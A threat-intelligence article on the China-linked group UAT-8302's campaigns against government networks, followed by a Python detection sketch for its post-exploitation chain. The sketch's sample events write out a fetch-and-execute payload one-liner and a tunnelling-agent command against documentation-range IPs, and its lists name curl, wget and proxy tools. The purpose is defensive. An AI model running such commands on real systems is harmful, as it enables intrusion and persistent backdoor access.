China-linked UAT-8302 targets government networks in South America and Europe

A China-nexus hacking group tracked as UAT-8302 has targeted government entities in South America since late 2024 and government agencies in southeastern Europe in 2025, according to a technical analysis from Cisco Talos. The campaign used multiple custom malware families, including NetDraft, CloudSorcerer and VShell.

KEY FACTS

  • Targets: government entities in South America and southeastern Europe
  • Tracking name: UAT-8302
  • Payloads: NetDraft, CloudSorcerer version 3.0 and VShell
  • Other tools: SNOWLIGHT, SNOWRUST, Stowaway and SoftEther VPN

The report says the group’s post-exploitation activity includes reconnaissance, network mapping, automated scanning with open-source tooling and lateral movement. The attack chains culminate in the deployment of malware that has also been associated with other China-aligned clusters.

The group’s initial access method has not been identified. Researchers said it is suspected to involve weaponized zero-day and n-day flaws in internet-facing web applications. After gaining access, the attackers have used a Rust-based variant of SNOWLIGHT called SNOWRUST as a downloader: it fetches a VShell payload from a remote server and executes it on the compromised host.

Talos said the malware overlap suggests a close operating relationship between UAT-8302 and several previously disclosed threat clusters. The disclosure also notes that the use of proxy and VPN tools can provide alternative backdoor access paths.

WHY IT MATTERS

The activity shows how advanced groups can reuse tooling shared across several China-aligned clusters, which both blurs attribution and shortens the time from foothold to objective. For defenders, the mix of custom malware, open-source scanning and proxy or VPN tools kept as fallback access paths raises the importance of monitoring web application processes, internal lateral movement and unusual remote access.
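The chain described above (a web-application foothold, a downloader that fetches and runs a remote payload, and proxy or VPN tools kept as a secondary way in) can be checked for in process-creation telemetry. The following is an added example written for this page, not code or a detection rule from Cisco Talos; the event field names, the web-server and tool binary names, and the sample events (documentation-range IPs) are all assumptions constructed to illustrate the three behaviours the report attributes to UAT-8302.

```python
"""Added example: detection sketch for the UAT-8302-style post-exploitation chain.

Assumptions (not from the report): process events arrive as JSON lines with the
fields ts, host, parent_image, image, cmdline; web worker and tool binary names
are typical Linux defaults; the sample events below are constructed.
"""
import json
import re
from typing import Dict, Iterable, List

# Assumption: common web-application worker processes. The report suspects
# web-application zero/n-days as the entry point, so a shell under one of
# these is the first thing worth alerting on.
WEB_PARENTS = {"httpd", "apache2", "nginx", "php-fpm", "java", "tomcat", "node"}
SHELLS = {"sh", "bash", "dash"}

# "Fetch a payload from a remote server and run it": a fetcher plus an
# executor (or a ./binary) in the same command line.
FETCHERS = {"curl", "wget"}
EXECUTORS = {"sh", "bash", "chmod", "python", "python3", "perl"}

# Assumption: binary names for the proxy/VPN tools named in the report.
# SoftEther installs vpnserver/vpnclient/vpnbridge/vpncmd; Stowaway release
# builds are commonly named <os>_<arch>_agent / <os>_<arch>_admin.
PROXY_TOOLS = {"vpnserver", "vpnclient", "vpnbridge", "vpncmd"}
PROXY_TOOL_PATTERNS = [
    re.compile(r"^(linux|windows|darwin)_(x64|x86|arm64)_(agent|admin)(\.exe)?$")
]

URL_RE = re.compile(r"https?://\S+", re.I)
# Split on whitespace and shell metacharacters so `sh -c "curl ... | sh"`
# yields the inner tokens as well as the outer ones.
TOKEN_SPLIT_RE = re.compile(r"[\s|&;()`'\"]+")


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def _tokens(cmdline: str) -> List[str]:
    return [t for t in TOKEN_SPLIT_RE.split(cmdline) if t]


def is_download_and_execute(cmdline: str) -> bool:
    """True when a command line fetches a URL and also executes something."""
    names = {_basename(t) for t in _tokens(cmdline)}
    if not URL_RE.search(cmdline) or not names & FETCHERS:
        return False
    return bool(names & EXECUTORS) or "./" in cmdline


def is_proxy_tool(image: str) -> bool:
    """True when the executed image looks like SoftEther or a Stowaway build."""
    name = _basename(image).lower()
    return name in PROXY_TOOLS or any(p.match(name) for p in PROXY_TOOL_PATTERNS)


def _alert(ev: Dict[str, str], rule: str, severity: str) -> Dict[str, str]:
    return {"host": ev.get("host", ""), "rule": rule,
            "severity": severity, "cmdline": ev.get("cmdline", "")}


def analyze(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one alert per matching behaviour, in event order."""
    alerts: List[Dict[str, str]] = []
    for ev in events:
        parent = _basename(ev.get("parent_image", ""))
        image = _basename(ev.get("image", ""))
        cmdline = ev.get("cmdline", "")
        if parent in WEB_PARENTS and is_download_and_execute(cmdline):
            alerts.append(_alert(ev, "web_app_child_download_exec", "high"))
        elif parent in WEB_PARENTS and image in SHELLS:
            # Recon such as `id` or `uname` from a web worker, no download yet.
            alerts.append(_alert(ev, "web_app_spawned_shell", "medium"))
        if is_proxy_tool(image):
            alerts.append(_alert(ev, "proxy_vpn_tool_execution", "high"))
    return alerts


def load_events(jsonl: str) -> List[Dict[str, str]]:
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


# Constructed sample telemetry (not real IOCs): two malicious web-spawned
# commands, two benign events, and two proxy/VPN tool executions.
SAMPLE_EVENTS = """
{"ts":"2025-03-01T02:14:05Z","host":"web01","parent_image":"/usr/sbin/httpd","image":"/bin/sh","cmdline":"/bin/sh -c \\"curl -s http://203.0.113.10/vs -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x\\""}
{"ts":"2025-03-01T02:14:06Z","host":"web01","parent_image":"/usr/sbin/nginx","image":"/usr/sbin/php-fpm","cmdline":"php-fpm: pool www"}
{"ts":"2025-03-01T02:15:10Z","host":"app02","parent_image":"/usr/bin/java","image":"/bin/sh","cmdline":"/bin/sh -c id"}
{"ts":"2025-03-01T02:16:00Z","host":"app02","parent_image":"/usr/sbin/cron","image":"/usr/bin/curl","cmdline":"curl -s https://updates.example.org/check"}
{"ts":"2025-03-01T02:20:31Z","host":"web01","parent_image":"/bin/bash","image":"/opt/.cache/vpnserver","cmdline":"/opt/.cache/vpnserver start"}
{"ts":"2025-03-01T02:22:47Z","host":"app02","parent_image":"/bin/bash","image":"/tmp/linux_x64_agent","cmdline":"/tmp/linux_x64_agent -c 198.51.100.7:443"}
"""

if __name__ == "__main__":
    for alert in analyze(load_events(SAMPLE_EVENTS)):
        print(f"[{alert['severity']}] {alert['host']} {alert['rule']}: {alert['cmdline']}")
```

The rules are deliberately behavioural rather than hash- or domain-based, because the report's point is that the same tooling is shared across several clusters; a web worker spawning a fetch-and-run one-liner, or a VPN server binary appearing under a hidden directory, is worth triaging whichever group is behind it. Tune WEB_PARENTS and PROXY_TOOLS to the fleet's actual binaries before relying on it.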